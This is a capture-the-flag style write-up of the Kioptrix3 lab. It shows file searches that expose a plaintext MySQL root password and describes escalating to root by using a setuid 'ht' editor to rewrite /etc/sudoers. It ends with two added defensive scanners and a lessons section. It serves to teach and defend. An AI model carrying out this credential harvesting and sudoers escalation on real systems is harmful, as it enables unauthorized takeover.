/usr/share/phpmyadmin/server_privileges.php:685: . $spaces . ' <input type="button" id="button_generate_password" value="' . $GLOBALS['strGenerate'] . '" onclick="suggestPassword()" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:686: . $spaces . ' <input type="button" id="button_copy_password" value="' . $GLOBALS['strCopy'] . '" onclick="suggestPasswordCopy(this.form)" />' . "\n"
/usr/share/phpmyadmin/server_privileges.php:712: // uses $password
/usr/share/phpmyadmin/server_privileges.php:713: if (!isset($password) && isset($Password)) {
/usr/share/phpmyadmin/server_privileges.php:714: $password=$Password;
/usr/share/phpmyadmin/server_privileges.php:773: if ($pred_password != 'none' && $pred_password != 'keep') {
/usr/share/phpmyadmin/server_privileges.php:782: if ($pred_password == 'keep' && !empty($password)) {
/usr/share/phpmyadmin/server_privileges.php:783: $real_sql_query .= ' IDENTIFIED BY PASSWORD \'' . $password . '\'';
/usr/share/phpmyadmin/server_privileges.php:785: $create_user_real .= ' IDENTIFIED BY PASSWORD \'' . $password . '\'';
/usr/share/phpmyadmin/server_privileges.php:866: // we put the query containing the hidden password in
/usr/share/phpmyadmin/server_privileges.php:1093: * Updates the password
/usr/share/phpmyadmin/server_privileges.php:1096: // similar logic in user_password.php
/usr/share/phpmyadmin/server_privileges.php:1114: // in $sql_query which will be displayed, hide the password
/usr/share/phpmyadmin/server_privileges.php:1220: // when there is a query containing a hidden password, take it
/usr/share/phpmyadmin/server_privileges.php:1921: require_once './libraries/display_change_password.lib.php';
/usr/share/phpmyadmin/config.sample.inc.php:14: * This is needed for cookie based authentication to encrypt password in
/usr/share/phpmyadmin/scripts/setup.php:708: * 'password' means password input.
/usr/share/phpmyadmin/scripts/setup.php:735: } elseif ($val[3] == 'password') {
/usr/share/phpmyadmin/scripts/setup.php:736: $type = 'password';
/usr/share/phpmyadmin/scripts/setup.php:741: case 'password':
/usr/share/phpmyadmin/scripts/setup.php:827: array('Show password change form', 'ShowChgPassword', 'Whether to show form for changing password, this does not limit ability to execute the same command directly', FALSE),
/usr/share/phpmyadmin/scripts/setup.php:1007: array('Password for config auth', 'password', 'Leave empty if not using config auth', 'password'),
/usr/share/phpmyadmin/scripts/setup.php:1011: array('phpMyAdmin control user password', 'controlpass', 'Password for user which phpMyAdmin can use for various actions', 'password'),
/usr/share/phpmyadmin/scripts/setup.php:1351: $new_server = grab_values('host;extension;port;socket;connect_type;compress:bool;controluser;controlpass;auth_type;user;password;only_db;verbose;pmadb;bookmarktable:serialized;relation:serialized;table_info:serialized;table_coords:serialized;pdf_pages:serialized;column_info:serialized;designer_coords:serialized;history:serialized;AllowDeny:serialized;SignonSession;SignonURL;LogoutURL');
/usr/share/phpmyadmin/scripts/setup.php:1388: message('error', 'Empty phpMyAdmin control user password while using pmadb!');
/usr/share/phpmyadmin/scripts/setup.php:1423: unset($new_server['password']);
/usr/share/phpmyadmin/scripts/setup.php:1964: message('warning', 'You are not using secure connection, all data (including sensitive, like passwords) are transfered unencrypted!' . $redir, 'Not secure connection');
/usr/share/phpmyadmin/phpmyadmin.css.php:611:li#li_change_password {
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:28:$strAccessDeniedExplanation = 'phpMyAdmin ha provato a connettersi al server MySQL, e il server ha rifiutato la connessione. Si dovrebbe controllare il nome dell\'host, l\'username e la password nel file config.inc.php ed assicurarsi che corrispondano alle informazioni fornite dall\'amministratore del server MySQL.';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:131:$strChangePassword = 'Cambia password';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:380:$strInsecureMySQL = 'Il file di configurazione in uso contiene impostazioni (root con nessuna password) che corrispondono ai privilegi dell\'account MySQL predefinito. Un server MySQL funzionante con queste impostazioni è aperto a intrusioni, e si dovrebbe realmente riparare a questa falla nella sicurezza.';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:410:$strKeepPass = 'Non cambiare la password';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:549:$strPasswordChanged = 'La password per l\'utente %s è cambiata con successo.';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:550:$strPasswordEmpty = 'La password è vuota!';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:552:$strPasswordNotSame = 'La password non coincide!';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:704:$strSecretRequired = 'Adesso c\'è bisogno di una password per il file di configurazione (blowfish_secret).';
/usr/share/phpmyadmin/lang/italian-utf-8.inc.php:1021:$strWrongUser = 'Nome utente o password errati. Accesso negato.';
/usr/share/phpmyadmin/lang/norwegian-utf-8.inc.php:26:$strAccessDeniedExplanation = 'phpMyAdmin forsøkte å koble til MySQL-serveren, og serveren avviste tilkoblingen. Du må kontrollere vert (host), brukernavn (username) og passord (password) i config.inc.php og sjekke at de tilsvarer den informasjonen du fikk fra MySQL-server administratoren.';
/usr/share/phpmyadmin/lang/persian-utf-8.inc.php:350:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/thai-utf-8.inc.php:600:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:272:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:483:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.'; //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:608:$strPasswordEmpty = 'The password is empty!'; //to translate
/usr/share/phpmyadmin/lang/hindi-utf-8.inc.php:610:$strPasswordNotSame = 'The passwords aren\'t the same!'; //to translate
/usr/share/phpmyadmin/lang/albanian-utf-8.inc.php:271:$strInsecureMySQL = 'File i konfigurimit në përdorim përmban zgjedhje (root pa asnjë password) që korrispondojnë me të drejtat e account MySQL të paracaktuar. Një server MySQL funksionues me këto zgjedhje është i pambrojtur ndaj sulmeve, dhe ju duhet patjetër të korrigjoni këtë vrimë në siguri.';
/usr/share/phpmyadmin/lang/georgian-utf-8.inc.php:360:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/georgian-utf-8.inc.php:552:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.'; //to translate
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:28:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:131:$strChangePassword = 'Change password';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:380:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:410:$strKeepPass = 'Do not change the password';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:549:$strPasswordChanged = 'The password for %s was changed successfully.';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:550:$strPasswordEmpty = 'The password is empty!';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:552:$strPasswordNotSame = 'The passwords aren\'t the same!';
/usr/share/phpmyadmin/lang/english-utf-8.inc.php:1021:$strWrongUser = 'Wrong username/password. Access denied.';
/usr/share/phpmyadmin/lang/azerbaijani-utf-8.inc.php:603:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/afrikaans-utf-8.inc.php:385:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/afrikaans-utf-8.inc.php:563:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.'; //to translate
/usr/share/phpmyadmin/lang/ukrainian-utf-8.inc.php:22:$strAccessDeniedExplanation = 'phpMyAdmin спробував з\'єднатися з MySQL сервером, але сервер не дозволив під\'єднання. Прошу перевірити значення host, username та password у файлі config.inc.php та впевнитися, що вони відповідають даним отриманим Вами від адміністратора MySQL сервера.';
/usr/share/phpmyadmin/lang/korean-utf-8.inc.php:442:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:30:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:354:$strInsecureMySQL = 'Your configuration file contains settings (root with no password) that correspond to the default MySQL privileged account. Your MySQL server is running with this default, is open to intrusion, and you really should fix this security hole.';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:517:$strPasswordChanged = 'The password for %s was changed successfully.';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:518:$strPasswordEmpty = 'The password is empty!';
/usr/share/phpmyadmin/lang/sinhala-utf-8.inc.php:520:$strPasswordNotSame = 'The passwords aren\'t the same!';
/usr/share/phpmyadmin/lang/malay-utf-8.inc.php:440:$strAccessDeniedExplanation = 'phpMyAdmin tried to connect to the MySQL server, and the server rejected the connection. You should check the host, username and password in your configuration and make sure that they correspond to the information given by the administrator of the MySQL server.'; //to translate
/usr/share/phpmyadmin/lang/french-utf-8.inc.php:25:$strAccessDeniedExplanation = 'phpMyAdmin a tenté de se connecter au serveur MySQL, et le serveur a rejeté la connexion. Veuillez vérifier les valeurs de "host", "username" et "password" dans votre configuration et vous assurer qu\'elles correspondent aux informations fournies par l\'administrateur du serveur MySQL.';
/usr/share/phpmyadmin/main.php:44: // password if the configuration permits
/usr/share/phpmyadmin/main.php:203: * Change password
/usr/share/phpmyadmin/main.php:208: PMA_printListItem($strChangePassword, 'li_change_password',
/usr/share/phpmyadmin/main.php:209: './user_password.php?' . $common_url_query);
/usr/share/phpmyadmin/main.php:343: && $cfg['Server']['password'] == '') {
/etc/phpmyadmin/config.inc.php:10: * NOTE: do not add security sensitive data to this file (like passwords)
/home/www/kioptrix3.com/gallery/gfunctions.php:11: $GLOBALS["gallarific_mysql_password"])
/home/www/kioptrix3.com/gallery/gfunctions.php:583: $password = escape($_POST["password"]);
/home/www/kioptrix3.com/gallery/gfunctions.php:679: $query = sprintf("insert into gallarific_users(username, password, usertype, firstname, lastname, email, datejoined, website, issuperuser, photo, joincode) values('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s')", $username, $password, "normaluser", $firstname, $lastname, $email, time(), $website, 0, $photo_file, $join_code);
/home/www/kioptrix3.com/gallery/gfunctions.php:771: if(isset($_POST["gusername"]) && isset($_POST["gpassword"])) {
/home/www/kioptrix3.com/gallery/gfunctions.php:773: $password = escape($_POST["gpassword"]);
/home/www/kioptrix3.com/gallery/gfunctions.php:774: $query = sprintf("select * from gallarific_users where username='%s' and password='%s'", $username, $password);
/home/www/kioptrix3.com/gallery/gfunctions.php:794: $error = "Your username or password is incorrect. Please login again.";
/home/www/kioptrix3.com/gallery/gfunctions.php:799: $error = "Your username or password is incorrect. Please login again.";
/home/www/kioptrix3.com/gallery/gfunctions.php:857: $password = escape($_POST["password"]);
/home/www/kioptrix3.com/gallery/gfunctions.php:946: $query = sprintf("update gallarific_users set password='%s', firstname='%s', lastname='%s', email='%s', website='%s' where userid='%d'", $password, $firstname, $lastname, $email, $website, $user_id);
/home/www/kioptrix3.com/gallery/gfunctions.php:948: $query = sprintf("update gallarific_users set password='%s', firstname='%s', lastname='%s', email='%s', website='%s', photo='%s' where userid='%d'", $password, $firstname, $lastname, $email, $website, $photo_file, $user_id);
/home/www/kioptrix3.com/gallery/gconfig.php:20: $GLOBALS["gallarific_mysql_password"] = "fuckeyou";
/home/www/kioptrix3.com/gallery/gconfig.php:24:if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$
Searching for the word password in files with the *.php extension turned up the password fuckeyou in the file gconfig.php under /home/www/kioptrix3.com/gallery/. On closer inspection, fuckeyou turns out to be the root password for MySQL (see lines 52 and 53), not the root credential of the operating system: using that password to log in to the root account produces the message "Authentication failure".
loneferret@Kioptrix3:~$ cd /home/www/kioptrix3.com/gallery/
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ ls -l
total 156
drwxr-xr-x 2 root root 4096 2011-04-12 16:24 BACK
-rw-r--r-- 1 root root 3573 2009-10-10 15:43 db.sql
drwxr-xr-x 3 root root 4096 2011-04-12 13:14 gadmin
-rw-r--r-- 1 root root 214 2011-04-12 15:15 gallery.php
-rw-r--r-- 1 root root 1440 2011-04-14 11:32 gconfig.php
-rw-r--r-- 1 root root 297 2011-04-12 19:26 gfooter.php
-rw-r--r-- 1 root root 38771 2011-04-12 15:19 gfunctions.php
-rw-r--r-- 1 root root 1009 2011-04-12 15:11 gheader.php
-rw-r--r-- 1 root root 252 2011-04-12 15:10 g.php
-rw-r--r-- 1 root root 249 2011-04-12 15:03 index.php
-rw-r--r-- 1 root root 10340 2011-04-12 15:21 install.BAK
-rw-r--r-- 1 root root 212 2011-04-12 16:24 login.php
-rw-r--r-- 1 root root 213 2011-04-12 15:13 logout.php
drwxrwxrwx 2 root root 4096 2011-04-12 21:21 photos
-rw-r--r-- 1 root root 213 2011-04-12 15:20 photos.php
-rw-r--r-- 1 root root 219 2011-04-12 15:16 post_comment.php
-rw-r--r-- 1 root root 249 2011-04-12 15:14 p.php
-rw-r--r-- 1 root root 214 2011-04-12 15:58 profile.php
-rw-r--r-- 1 root root 87 2009-10-10 15:44 readme.html
-rw-r--r-- 1 root root 213 2011-04-12 15:17 recent.php
-rw-r--r-- 1 root root 215 2011-04-12 16:21 register.php
drwxr-xr-x 2 root root 4096 2011-04-13 04:24 scopbin
-rw-r--r-- 1 root root 213 2011-04-12 16:23 search.php
-rw-r--r-- 1 root root 216 2011-04-12 15:22 slideshow.php
-rw-r--r-- 1 root root 211 2011-04-12 15:18 tags.php
drwxr-xr-x 6 root root 4096 2011-04-12 13:14 themes
-rw-r--r-- 1 root root 56 2009-10-10 16:23 version.txt
-rw-r--r-- 1 root root 211 2011-04-12 15:23 vote.php
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$ cat gconfig.php
<?php
error_reporting(0);
/*
A sample Gallarific configuration file. You should edit
the installer details below and save this file as gconfig.php
Do not modify anything else if you don't know what it is.
*/
// Installer Details -----------------------------------------------
// Enter the full HTTP path to your Gallarific folder below,
// such as http://www.yoursite.com/gallery
// Do NOT include a trailing forward slash
$GLOBALS["gallarific_path"] = "http://kioptrix3.com/gallery";
$GLOBALS["gallarific_mysql_server"] = "localhost";
$GLOBALS["gallarific_mysql_database"] = "gallery";
$GLOBALS["gallarific_mysql_username"] = "root";
$GLOBALS["gallarific_mysql_password"] = "fuckeyou";
// Setting Details -------------------------------------------------
if(!$g_mysql_c = @mysql_connect($GLOBALS["gallarific_mysql_server"], $GLOBALS["gallarific_mysql_username"], $GLOBALS["gallarific_mysql_password"])) {
echo("A connection to the database couldn't be established: " . mysql_error());
die();
}else {
if(!$g_mysql_d = @mysql_select_db($GLOBALS["gallarific_mysql_database"], $g_mysql_c)) {
echo("The Gallarific database couldn't be opened: " . mysql_error());
die();
}else {
$settings=mysql_query("select * from gallarific_settings");
if(mysql_num_rows($settings)!=0){
while($data=mysql_fetch_array($settings)){
$GLOBALS["{$data['settings_name']}"]=$data['settings_value'];
}
}
}
}
?>
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$
loneferret@Kioptrix3:/home/www/kioptrix3.com/gallery$
loneferret@Kioptrix3:~$ id
uid=1000(loneferret) gid=100(users) groups=100(users)
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ su root
Password:
su: Authentication failure
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$
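A defender-side check for the finding above, added here as an example that is not part of the write-up or of Gallarific: a Python scanner that repeats the grep for password across PHP files under a web root, then flags a web application that logs in as the MySQL root account and a credential file every local user can read (gconfig.php is mode 0644 in the listing above). The sample web root, its key names and the password value are constructed for the example.

```python
"""Find hard-coded database credentials in PHP config files under a web root.

Added example, not part of the Kioptrix write-up or of Gallarific. It repeats
the grep for 'password' across *.php, then adds the checks the gconfig.php
finding calls for: the web app logging in as the MySQL root account, and a
credential file every local user can read (gconfig.php is mode 0644).
Secrets are reported masked. The sample web root and its values are constructed.
"""
import os
import re
import stat
import tempfile
from collections import namedtuple

Finding = namedtuple("Finding", "path kind detail")

# Matches  $GLOBALS["name"] = "value";  and  $name = 'value';
ASSIGN_RE = re.compile(
    r"""\$(?:GLOBALS\s*\[\s*["'](?P<key>\w+)["']\s*\]|(?P<var>\w+))"""
    r"""\s*=\s*["'](?P<val>[^"']*)["']\s*;""")


def scan_php_file(path):
    """Findings for one PHP file: hard-coded password, root DB user, loose file mode."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            m = ASSIGN_RE.search(line)
            if not m:
                continue
            key, val = (m.group("key") or m.group("var")).lower(), m.group("val")
            if key.endswith(("pass", "passwd", "password", "pwd")) and val:
                masked = val[0] + "*" * (len(val) - 1)    # never log the secret itself
                findings.append(Finding(path, "hardcoded_password", f"line {lineno}: {key} = {masked}"))
            elif key.endswith(("user", "username")) and val == "root":
                findings.append(Finding(path, "privileged_db_account", f"line {lineno}: {key} = root"))
    mode = os.stat(path).st_mode
    if findings and mode & stat.S_IROTH:               # only matters if the file holds a secret
        findings.append(Finding(path, "world_readable", f"mode {stat.S_IMODE(mode):04o}"))
    return findings


def audit_webroot(root):
    """Walk root and scan every *.php file, plus .BAK copies such as install.BAK."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(".php") or name.upper().endswith(".BAK"):
                findings.extend(scan_php_file(os.path.join(dirpath, name)))
    return findings


def build_sample_webroot():
    """Create a throwaway web root holding a Gallarific-style config (constructed)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    gallery = os.path.join(root, "gallery")
    os.makedirs(gallery)
    cfg = os.path.join(gallery, "gconfig.php")
    with open(cfg, "w", encoding="utf-8") as fh:
        fh.write('<?php\n$GLOBALS["gallarific_mysql_server"] = "localhost";\n'
                 '$GLOBALS["gallarific_mysql_username"] = "root";\n'
                 '$GLOBALS["gallarific_mysql_password"] = "Sample-Not-Real";\n?>\n')
    os.chmod(cfg, 0o644)                               # same mode as on the target
    return root


if __name__ == "__main__":
    for f in audit_webroot(build_sample_webroot()):
        print(f"{f.kind:22} {f.path}: {f.detail}")
```

Running it against a real document root (for example /home/www) lists every config that would need a dedicated low-privilege DB account and tighter file permissions.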
Looking further, we found something interesting in the home folder of the user loneferret: a file named CompanyPolicy.README. The file states that the Lead Programmer (loneferret) must use a program called "ht" to create, view and edit files; using any other program will bring management sanctions. Note the execution of the following commands:
loneferret@Kioptrix3:~$ ls -l
total 32
-rwxrwxr-x 1 root root 26275 2011-01-12 10:45 checksec.sh
-rw-r--r-- 1 root root 224 2011-04-16 08:51 CompanyPolicy.README
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
Failure to do so will result in you immediate termination.
DG
CEO
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ sudo ht
Error opening terminal: xterm-256color.
loneferret@Kioptrix3:~$
Running the "ht" program produces an error. To work around it, it is enough to run export TERM=xterm first, after which "ht" starts normally. Further investigation shows that "ht" has the SUID permission set, meaning it runs with root's access rights. That is, of course, an opportunity to escalate privileges to root. Note the permissions of the "ht" program below:
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ find / -name ht 2>/dev/null
/usr/local/bin/ht
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ ls -l /usr/local/ht
ls: cannot access /usr/local/ht: No such file or directory
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$ ls -l /usr/local/bin/ht
-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht
loneferret@Kioptrix3:~$
loneferret@Kioptrix3:~$
The next step, then, is to run the "ht" program and edit the file /etc/sudoers to grant root access to the program /bin/sh. After that we succeed in escalating our privileges to root, as the steps in the following figures show:



Figures 6 through 8 show that the attacker has succeeded in escalating privileges to root and has taken over the Kioptrix3 server completely.
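The two conditions this escalation depends on, a setuid-root editor and a sudo rule that runs it, are exactly what a host audit should catch. Added here as an example that is not from the write-up: a Python scanner that lists setuid/setgid files under a directory tree, flags root-owned editors and anything not on an allowlist, and parses simple sudoers rules for commands that are editors. The editor list, the allowlist and the sudoers text are constructed (the write-up never shows the machine's real /etc/sudoers).

```python
"""Audit setuid/setgid binaries and sudo rules that hand users a file editor.

Added example, not part of the Kioptrix write-up. On the target /usr/local/bin/ht
is setuid root (-rwsr-sr-x) and policy says to run 'sudo ht'; an editor running
as root can rewrite /etc/sudoers, so either finding alone deserves an alert.
The editor list, the allowlist and the sudoers text are constructed here.
"""
import os
import stat
from collections import namedtuple

Finding = namedtuple("Finding", "kind path detail")
FILE_EDITORS = {"ht", "vi", "vim", "nano", "emacs", "ed"}   # team-maintained, not exhaustive
SUDOERS_SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")


def collect_setid(root):
    """Return (path, mode, uid) for regular files under root with setuid or setgid set."""
    out = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)                       # lstat: do not follow symlinks
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                out.append((path, st.st_mode, st.st_uid))
    return out


def audit_setid(entries, allowlist=frozenset()):
    """Flag every set-id file not on the allowlist; a root-owned editor is the worst case."""
    findings = []
    for path, mode, uid in entries:
        if path in allowlist:
            continue
        bits = "+".join(n for n, b in (("setuid", stat.S_ISUID), ("setgid", stat.S_ISGID)) if mode & b)
        if uid == 0 and os.path.basename(path) in FILE_EDITORS:
            findings.append(Finding("setid_root_editor", path, f"{bits}, owner uid 0"))
        else:
            findings.append(Finding("setid_unlisted", path, f"{bits}, owner uid {uid}"))
    return findings


def audit_sudoers(text):
    """Flag sudoers rules whose command list names a file editor (simple rule syntax only)."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.split()[0] in SUDOERS_SKIP or "=" not in line:
            continue
        who, _, rhs = line.partition("=")            # "user host" = "(runas) tags cmd, cmd"
        if rhs.lstrip().startswith("("):
            rhs = rhs.split(")", 1)[1]
        for cmd in rhs.split(","):
            words = [w for w in cmd.split() if not w.endswith(":")]   # drops NOPASSWD: etc.
            if not words or words[0] == "ALL":       # blanket sudo is a separate policy question
                continue
            prog = os.path.basename(words[0])
            if prog in FILE_EDITORS:
                findings.append(Finding("sudo_editor", words[0], f"{who.split()[0]} may run {prog} as root"))
    return findings


SAMPLE_SUDOERS = """\
# constructed sample; the write-up does not show the machine's real /etc/sudoers
Defaults env_reset
root       ALL=(ALL) ALL
%admin     ALL=(ALL) ALL
loneferret ALL=(ALL) NOPASSWD: /usr/local/bin/ht
"""

if __name__ == "__main__":
    for f in audit_setid(collect_setid("/usr/local/bin")) + audit_sudoers(SAMPLE_SUDOERS):
        print(f"{f.kind:18} {f.path}: {f.detail}")
```

On a real host, collect_setid("/") with an allowlist of the distribution's own set-id binaries and audit_sudoers(open("/etc/sudoers").read()) run as root would have flagged both sides of this setup.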
Lesson Learned
The important lesson from this third part of the Kioptrix series is that an attacker is "very hungry" for credentials. It began with a brute-force attack against the SSH service to obtain loneferret's credentials, and went on to seize root's credentials and take over the whole server by abusing the SUID permission on the "ht" program.
The start of this disaster was the weak password of loneferret, the newly hired Lead Programmer. Then, as lead programmer, he did not follow secure-coding best practice: he wrote the MySQL administrator's password into a file in plain text.
This is certainly an important lesson for Electronic System Operators (Penyelenggara Sistem Elektronik): always protect the credentials of your systems, not only the administrator's but every user's, because an attacker will move laterally before finally seizing root's credentials.